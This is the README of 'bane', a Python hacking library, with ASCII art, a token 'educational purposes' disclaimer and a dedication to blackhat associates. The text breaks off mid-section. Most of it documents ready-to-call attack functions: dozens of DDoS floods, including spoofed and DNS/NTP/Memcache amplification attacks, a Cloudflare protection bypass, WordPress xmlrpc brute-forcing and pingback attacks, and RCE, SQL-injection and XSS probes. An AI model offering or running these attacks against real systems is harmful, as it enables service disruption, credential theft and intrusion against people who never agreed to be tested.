"Oh, you think darkness is your ally. But you merely adopted the dark; I was born in it, molded by it. I didn't see the light until I was already a man, by then it was nothing to me but BLINDING! The shadows betray you, because they belong to me!" -Bane (Dark Knight)



                                .///` `.--::::::---.`` `///.                                    
                                h-.-s+++/--<br>.---/+o++s:.-h                                    
                                ++..-.                `:../s                                    
                             -+ydm-..:                :..-dmho:`                                
                          :odmNNNNs..-.              `:..+MNNNmmy/.                            `
                       .odmNNNNMMMN`..:              -..`mMMMMNNNNmy:                           
                      +mNNNNMMMMMMMo`.:`             :``/MMMMMMMMNNNmy.                         
                    .yNNNNMMMMMMMMMd` `-<br>```````..-` `yMMMMMMMMMMNNNd:                        
                   -dNNNMMMMMMMMMMMN`  ..-`      `-`-   mMMMMMMMMMMMMNNmo                       
                  :mNNNMMMMMMMMMMMMM:   .         `.`  -MMMMMMMMMMMMMMNNNs`                     
                 /mNNNMMMMMMMMMMMMMMy   ---      .--   oMMMMMMMMMMMMMMMNNNy`                    
                :mNNNMMMMMMMMMMMMMMMN```:.````````.:```dMMMMMMMMMMMMMMMMNNNy`                   
               -mNNNNMMMMMMMMMMMMMMMMo`.-`        `-.`+MMMMMMMMMMMMMMMMMNNNNo                   
               hNNNNNMMMMMMMMMMMMMMMMm.``-        .``.dMMMMMMMMMMMMMMMMMMNNNm-                  
              -NNNNNMMMMMMMMMMMMMMMMMM-..:        -<br>NMMMMMMMMMMMMMMMMMMNNNNs                  
              oNNNNNMMMMMMMMMMMMMMMMMMo``.`       -` +MMMMMMMMMMMMMMMMMMMNNNNm                  
             :dNNNNNNMMMMMMMMMMMMMMMMMd<br>-``````<br>.hMMMMMMMMMMMMMMMMMMMNNNNNs.                
           .ssmNNNNNNMMMMMMMMMMMMMMMMMM.``/:.  .-/```NMMMMMMMMMMMMMMMMMMNNNNNNyy+`             `
         `oy: mNNNNNNMMMMMMMMMMMMMMMMMM/``-`    `-``:MMMMMMMMMMMMMMMMMMMNNNNNN/`+y:            `
         +y`  dNNNNNNMMMMMMMMMMMMMMMMMMy..-:-  --:..oMMMMMMMMMMMMMMMMMMMNNNNNN:  -N`            
         m-   hNNNNNNMMMNdhhyyhddmMMMMMd```:.``.:```hMMMMNdhso++++shmNMMMNNNNN:   yo           `
        /d    yNNNNNMMh/-````````.-/ydNM.``-    -```NNds:.`..-----..-sNMMNNNNN-   -m`           
        h+    sNNNNNMMmsyhddmmmdhs:` `-o/../`  `/-.:+-` `:yhddmNNNNmmNMMMNNNNN.    d/           
        m/    oNNNNNMMMMMMMNdyssoooo:` `:..``.+```.-.  :o++//+yydMMMMMMMMNNNNN`   .so           
        d--   /NNNNNNMMMMMmyhm//   ymy.`-     o    `- odm:-  .ddssNMMMMMNNNNNm    /:s           
       .h /   :NNNNNNNMMMmhshhy+++ohy/. .:   `o`  `/``-shysssyddddNMMMMNNNNNNd   --.h 
       -y `:  .NNNNNNNMMMMMMMMNNmmmhys/:.`..``.``..`-:syhhdmNNMMMMMMMMMMNNNNNy   / `d 
       :s  :`  dNNNNNMMMMMMMMMNNNmmNNh-    `.`  `.`  `+mMNNNNNMMMMMMMMMMNNNNN+  :`  m          `
       /o   /` oNNNNMMMMMMMMMMMMMMmd+.. `.:- -` - -:.. -sddmNMMMMMMMMMMMMNNNm. .:   m          `
       ++   `:``dNNNMMMMMMMMMMMNo+/.`./-. o`  --`  o `-/.``/+omMMMMMMMMMMNNNo .:    d`         `
       -h    `:`:mNNMMMMMMMMMMd-.+.+--:.`.+.-.::.-./-`.:--/:+..hMMMMMMMMMNNh`.:    -h          `
        s:    `:`+mNMMMMMMMMMm- `/:` o/://++:++++:+/+/:/o``:+` .mMMMMMMMMNd..:     y-           
        .h     `:`/hNMMMMMMd+: -::<br>s-:+`.+:+-.+:+:`/:-+:-.-:- :NMMMMMMNy.--    :y            
         o/   ` `:``:ymMNh:`-  /:-+`o::/`  +:/. +:+`  /::o./--+  /omMNdo- --  `   h.            
         `d` `+.` :.` -s:  -` ./:::`/::/   +-/. +-+`  :::/`-:::- `-`++.``-. `-+  :s             
          o+  /`-:``.-.   `-  /--/  /:-:   +-/. +-+   :-:+  /--/  .. `--. .:..:  h.             
          `d` :` +h+.     -  `+-:: .+-:+..-+://-+:+-../:-+-`-:-/.  -`   -yd. /  /s              
           o+ `:. -ydo.  -`  //::..o/-:o:.//:/++/:/+.:+/-/+: /::o   : :yd+``--  d.              
           `d   .:. -sy ..  .o--+ -.+-.`.-/<br>:/<br>/--`.-+.: +--o-  `/d+``--`:s               
            s/    .:` :.:```-o--o.-.:-` `:/   .:   /:` `-/ / s:-o-```+``.-`    h.               
            .h      -:`/.///`/..`:-.:`<br> <br><br><br>. <br>`: /--../ //:o.:.-y                
             s:       -o/::/:--.-.-.:                    : /`:.---/::+.       y-                
             `h.       ``/. `/ `  -.:```   <br><br>..`  ```: /  ` :` ./.     +o                 
              .y.         -.--    -.:.``- -```::```: ..`./ :    .-.-`       /s                  
               .y-                -.:```: :/::o+/::/ : ``: :              `+o                   
                `s+`     -..-     -.o/:/: `+::+//:+. -/::o`:     ..`-`   .s/                    
                  :s-  ./-  `-    -.o//o.  /:::-::+  `o//o :    -`  ./.`+o.                     
                   `/o:+..+`.`    -.://+<br>+--//:-+<br>////`:    `../-.ss-                       
                      /h  /` ..-`  .-o/+:..+--//:-+..-o/+:.` `-.- `+  y-                        
                       o+``.-+-.::<br>o//o- /--::--+ .o//s<br>:/.-//:``:s                         
                        -o:```.//:   :+::+.o--oo:-o.+::+/   :/o.```:o:                          
                          -o++oy.:    .- /`o::oo:-+-/ --    /o++++o:                            
                               `os      .. /..//../ ..`    `s:                                  
                                `o+.       `:`:-.-.     `.++-                                   
                                  `/+/.`    `.  .`   `-++:`                                     
                                     `:+++/:-<br>-:+++/-                                         
                                          `.-::--`                                              
                                                                                               `



---------------------------------------------------------------------------------------------------------------------------
                                                      INTRODUCTION:
---------------------------------------------------------------------------------------------------------------------------

This python library is made for educationnal purposes only. Me, as the creator and developper, not responsible for any misuse for this module in any malicious activity. it is made as a tool to understand how hackers can create their tools and performe their attacks. it contains most of known attacks and exploits. it can be used to perform: DoS and DDoS attacks (all known tools are included), information gathering, scrapping proxies, crawling, google dorking, checking for vulnerabilities (sql injection (all types), xss, command execution, php code injection, FI, forced browsing<br>) and even more ;)

---------------------------------------------------------------------------------------------------------------------------
                                                      SPECIAL SPEECH:
---------------------------------------------------------------------------------------------------------------------------

this is dedicated to my mentor: Zachary Barker ( https://www.facebook.com/zachary.barker.5439 ), he was my leader and teacher through my journey in hacking world and groups, we have been through a lot together and were there in many operations when i was an active member in blackhat community but now he is dead in a hit-and-run :( . he was one of my true cyber bros:

-S0u1 ( https://www.facebook.com/S0u1.HLoTW ) : programmer and blackhat.
<br>-Vince ( https://www.facebook.com/vincelinux ) : Linux and hardware expert, social engeneering and programmer.
<br>-Zachary Barker (lulz zombie) : teams leader, anarkist, ops organizer, progammer, cyber security expert and blackhat.
<br>-Lulztigre (https://www.twitter.com/lulztigre) : Bug Bounty Hunter, Penetration Tester And Python Programmer.
<br>-Jen Hill.
<br>in the honor of all my bros and the memory of my bro zach im sharing all my personal hacking tools with public for the first time. plz use it wisely :)

now let's start some tutorials, shall we?

---------------------------------------------------------------------------------------------------------------------------
                                                      TUTORIALS:
---------------------------------------------------------------------------------------------------------------------------
I-INSTALLING THE LIBRARY AND IMPORTING:
---------------------------------------------------------------------------------------------------------------------------

you can use pip to do that ( if you are on linux you must run it with "sudo" ) :


<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">pip install bane</pre></div>
or
<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">pip3 install bane</pre></div>


<br>or you can clone the project's link then run setup.py<br>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">git clone https://github.com/AlaBouali/bane
<br>cd bane
<br>python setup.py install
</pre></div>

<br>To use it, you have to open the python interpreter from your terminal/cmd (bane can be used only inside the interpreter only after importing it):

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">python</pre></div>
or
<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">python3</pre></div>
then import it and start using it as in the tutorials below:

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">import bane
</pre></div>

---------------------------------------------------------------------------------------------------------------------------
II-Usage (General usage):
---------------------------------------------------------------------------------------------------------------------------

# DDoS:

<h4>UDP FLOOD:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.udp_flood(IP, p= port , min_size=10, max_size=20 , duration= 300 , interval=0.001)
</pre></div>

<h4>TCP FLOOD:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.tcp_flood(IP, p= port , min_size=10, max_size=20 , duration= 300 , interval=0.001 , threads=500, timeout=5)
</pre></div>
<h4>HTTP FLOOD:</h4>
<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.http_spam(IP, p= port , duration= 300 ,interval=0.001 , threads=500 , timeout=5)
</pre></div>
<h4>HTTP FLOOD using proxies (HTTP/SOCKS4/SOCKS5):</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.prox_http_spam(IP, p= port , duration= 300 ,interval=0.001 , threads=500 , timeout=5)
</pre></div>
<h4>Torshammer attack:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.torshammer(IP, p= port , duration= 300 ,set_tor=False , threads=500 , timeout=5)
</pre></div>
<h4>Torshammer attack but through proxies instead of Tor:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.prox_hammer(IP, p= port , duration= 300 , threads=500 , timeout=5)
</pre></div>
<h4>R.U.D.Y attack:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.rudy(IP, p= port , duration= 300 ,set_tor=False , threads=500 , timeout=5 , form="q" , page="/search.php")
</pre></div>
<h4>Xerxes attack:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.xerxes(IP, p= port , duration= 300 ,set_tor=False , threads=500 , timeout=5 )
</pre></div>
<h4>Xerxes attack through proxies:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.prox_xerxes(IP, p= port , duration= 300 , threads=500 , timeout=5 )
</pre></div>
<h4>Slow read attack:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.slow_read(IP, p= port , duration= 300 , set_tor=False , threads=500 , timeout=5 )
</pre></div>
<h3>The below DDoS functions have been disabled and will be added again soon:</h3>
<h4>Slow proxies flood:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.prox_slow(IP, p= port , duration= 300 , set_tor=False , threads=500 , timeout=5 )
</pre></div>
<h4>Apache killer attack:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.apache_killer(IP, p= port , duration= 300 , set_tor=False , threads=500 , timeout=5 )
</pre></div>
<h4>Slowloris attack:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.slowloris(IP, p= port , duration= 300 , set_tor=False , threads=50 , timeout=5 )
</pre></div>
<h4>Slowloris attack through proxies:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.prox_slowloris(IP, p= port , duration= 300 , threads=500 , timeout=5 )
</pre></div>
<h4>Hulk attack:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.hulk(IP , duration= 300 , set_tor=False , threads=500 , timeout=5 )
</pre></div>
<h4>Hulk attack through proxies:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.prox_hulk(IP , duration= 300 , set_tor=False , threads=500 , timeout=5 )
</pre></div>
<h4>TCP flags attack:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.synflood(IP , p=port , duration= 300 , syn=1 , rst=0 , psh=0 , ack=0 , urg=0 , fin=0 , interval=0.1 , threads=50 )
</pre></div>
<h4>Spoofed source UDP flood:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.spoofed_udp_flood(IP , p=port , duration= 300 , min_size=10 , max_size=20 , interval=0.1 , threads=50 )
</pre></div>
<h4>LAND attack:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.land(IP , p=port , duration= 300 , min_size=10 , max_size=20 , interval=0.1 , threads=50 )
</pre></div>
<h4>DNS amplification attack:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.dns_amplification(IP , p=port , duration= 300 , servers=[] , interval=0.1 , threads=50 )
</pre></div>
<h4>NTP amplification attack:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.ntp_amplification(IP , p=port , duration= 300 , servers=[] , interval=0.1 , threads=50 )
</pre></div>
<h4>Memcache amplification attack:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.memcache_amplification(IP , p=port , duration= 300 , servers=[] , interval=0.1 , threads=50 )
</pre></div>
<h4>Chargen amplification attack:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.chargen_amplification(IP , p=port , duration= 300 , servers=[] , interval=0.1 , threads=50 )
</pre></div>
<h4>SSDP amplification attack:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.ssdp_amplification(IP , p=port , duration= 300 , servers=[] , interval=0.1 , threads=50 )
</pre></div>
<h4>SNMP amplification attack:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.snmp_amplification(IP , p=port , duration= 300 , servers=[] , interval=0.1 , threads=50 )
</pre></div>
<h4>ECHO reflection attack:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.echo_reflection(IP , p=port , min_size=10 , max_size=20 , duration= 300 , servers=[] , interval=0.1 , threads=50 )
</pre></div>
<h4>ICMP FLOOD:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.icmp_flood(IP, p= port , min_size=10, max_size=20 , duration= 300 , interval=0.001 , threads=500 )
</pre></div>
<h4>ICMP FLOOD with spoofed sources:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.spoofed_icmp_flood(IP, p= port , min_size=10, max_size=20 , duration= 300 , interval=0.001 , threads=500 )
</pre></div>
<h4>BlackNurse attack:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.blacknurse(IP, p= port , duration= 300 , interval=0.001 , threads=500 )
</pre></div>
<h4>Goldeneye attack:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.goldeneye(IP, p= port , duration= 300 , threads=500 , timeout=5 )
</pre></div>
<h4>Doser attack:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.doser(link , duration= 300 , set_tor=False , threads=500 , timeout=5 )
</pre></div>
<h4>Doser attack through proxies:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.doser(link , duration= 300 , threads=500 , timeout=5 )
</pre></div>
<h4>Bypass "Under attack mode" provided by CloudFlare:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.cf_kill_ua(link , duration= 300 , threads=500 , timeout=5 )
</pre></div>
<h4>Bypass "Under attack mode" provided by CloudFlare and Rate-Limiting:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.cf_kill_ua_rate_limiting(link , duration= 300 , set_tor=False , threads=500 , timeout=5 )
</pre></div>

# WordPress testing:

<h4>Users list:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.wp_users(link , timeout=15 )
</pre></div>

<h4>User's details:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.wp_user(link , user=1 , timeout=15 )
</pre></div>

<h4>All xmlrpc's available functions:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.wp_xmlrpc_methods(link , timeout=15 )
</pre></div>

<h4>Check if it's possible to performe BruteForce attack through xmlrpc:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.wp_xmlrpc_bruteforce(link , timeout=15 )
</pre></div>

<h4>Check if it's possible to performe Mass BruteForce attack through xmlrpc:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.wp_xmlrpc_mass_bruteforce(link , timeout=15 )
</pre></div>

<h4>Check a Login Combo:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.wpadmin(link , username , password , timeout=15 )
</pre></div>

<h4>Check Multiple Login Combo at once:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.wpadmin_mass(link , word_list=["admin:123","admin:HGJJK","admin:HJKL","admin:%MLK"] , timeout=15 )
</pre></div>

<h4>Check if it's possible to performe PingBack attack through xmlrpc:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.wp_xmlrpc_pingback(link , timeout=15 )
</pre></div>

<h4>Performe PingBack attack through xmlrpc:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.wp_xmlrpc_pingback(link , target_url="https://www.example.com" , timeout=15 )
</pre></div>

<h4>Check if it's possible to performe BruteForce attack through xmlrpc:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.wp_xmlrpc_bruteforce(link , timeout=15 )
</pre></div>

<h4>Users Enumeration:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.wp_users_enumeration(link , timeout=15 )
</pre></div>

<h4>WordPress version:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.wp_version(link , timeout=15 )
</pre></div>

<h4>Vulnerable plugins and themes:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.wp_scan(link , timeout=15 )
</pre></div>

# Vulnerabilities TESTING:

<h4>Automatic XSS scan for page:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.xss(link , payload="<script>alert(123)</script>" , timeout=15 )
</pre></div>

<h4>Remote Command Execution Linux Time-Based:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.rce(link ,injection={"command":"linux"},based_on='time', timeout=15 )
</pre></div>
<h4>Remote Command Execution Linux File-Based:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.rce(link ,injection={"command":"linux"},based_on='file', timeout=15 )
</pre></div>

<h4>Remote Command Execution Windows Time-Based:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.rce(link ,injection={"command":"windows"},based_on='time', timeout=15 )
</pre></div>
<h4>Remote Command Execution Windows File-Based:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.rce(link ,injection={"command":"windows"},based_on='file', timeout=15 )

</pre></div><h4>Remote Code Execution PHP Time-Based:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.rce(link ,injection={"code":"php"},based_on='time', timeout=15 )
</pre></div><h4>Remote Code Execution PHP File-Based:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.rce(link ,injection={"code":"php"},based_on='file', timeout=15 )

</pre></div><h4>Remote Code Execution PYTHON Time-Based:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.rce(link ,injection={"code":"python"},based_on='time', timeout=15 )
</pre></div><h4>Remote Code Execution PYTHON File-Based:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.rce(link ,injection={"code":"python"},based_on='file', timeout=15 )

</pre></div><h4>Remote Code Execution PERL Time-Based:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.rce(link ,injection={"code":"perl"},based_on='time', timeout=15 )
</pre></div><h4>Remote Code Execution PERL File-Based:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.rce(link ,injection={"code":"perl"},based_on='file', timeout=15 )

</pre></div><h4>Remote Code Execution RUBY Time-Based:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.rce(link ,injection={"code":"ruby"},based_on='time', timeout=15 )
</pre></div><h4>Remote Code Execution RUBY File-Based:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.rce(link ,injection={"code":"ruby"},based_on='file', timeout=15 )

</pre></div><h4>Remote Code Execution NODEJS Time-Based:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.rce(link ,injection={"code":"nodejs"},based_on='time', timeout=15 )
</pre></div><h4>Remote Code Execution NODEJS File-Based:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.rce(link ,injection={"code":"nodejs"},based_on='file', timeout=15 )

</pre></div><h4>SQL-Injection Time-Based:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.rce(link ,injection={"sql":"mysql"}, timeout=15 )#test for MySQL
</pre></div><h4>SQL-Injection Time-Based:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.rce(link ,injection={"sql":"oracle"}, timeout=15 )#test for Oracle
</pre></div><h4>SQL-Injection Time-Based:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.rce(link ,injection={"sql":"postgre"}, timeout=15 )#test for Postgre
</pre></div><h4>SQL-Injection Time-Based:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.rce(link ,injection={"sql":"sql_server"}, timeout=15 )#test for SQL Server


</pre></div><h4>File inclusion:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.file_inclusion(link, timeout=15 )

</pre></div><h4>Clickjacking:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.clickjacking(link, timeout=15 )

</pre></div><h4>CORS Misconfigurations:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.cors_misconfigurations(link, timeout=15 )

</pre></div><h4>CSRF:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">cookie="session=fgyujikop"#just an example of cookie sinceit requires a session
<br>bane.csrf(link, timeout=15 , cookie=cookie )


</pre></div><h4>Headers timeout:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.headers_timeout_test(IP , port=80, max_timeout=30 )
</pre></div><h4>Slow GET test:</h4>

